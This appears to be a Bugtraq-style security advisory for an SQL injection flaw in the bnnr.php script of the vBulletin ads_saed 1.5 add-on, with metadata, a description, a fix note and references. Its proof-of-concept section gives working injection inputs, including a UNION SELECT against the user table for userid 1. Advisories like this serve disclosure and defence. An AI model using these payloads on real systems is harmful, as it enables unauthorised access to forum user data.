vBulletin 'ads_saed' script 'bnnr.php' SQL Injection Vulnerability
BID:37539
Info
vBulletin 'ads_saed' script 'bnnr.php' SQL Injection Vulnerability
| Bugtraq ID: | 37539 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 30 2009 12:00AM |
| Updated: | Dec 31 2009 07:02PM |
| Credit: | Hussin X |
| Vulnerable: |
VBulletin ads_saed 1.5 |
| Not Vulnerable: | |
Discussion
vBulletin 'ads_saed' script 'bnnr.php' SQL Injection Vulnerability
The 'ads_saed' script for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects ads_saed 1.5; other versions may also be affected.
The 'ads_saed' script for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects ads_saed 1.5; other versions may also be affected.
Exploit / POC
vBulletin 'ads_saed' script 'bnnr.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example input is available:
user name = ' ORDER BY 15/*
user name = ' ORDER BY 16/*
user name = ' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*
Attackers can use a browser to exploit this issue.
The following example input is available:
user name = ' ORDER BY 15/*
user name = ' ORDER BY 16/*
user name = ' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*
Solution / Fix
vBulletin 'ads_saed' script 'bnnr.php' SQL Injection Vulnerability
Solution:
Reportedly, an update is available, but Symantec has not verified this information. Please see the references for details.
Solution:
Reportedly, an update is available, but Symantec has not verified this information. Please see the references for details.
References
vBulletin 'ads_saed' script 'bnnr.php' SQL Injection Vulnerability
References:
References:
- Solution for ads_saed (Jelsoft Enterprises)
- vBulletin Homepage (vBulletin)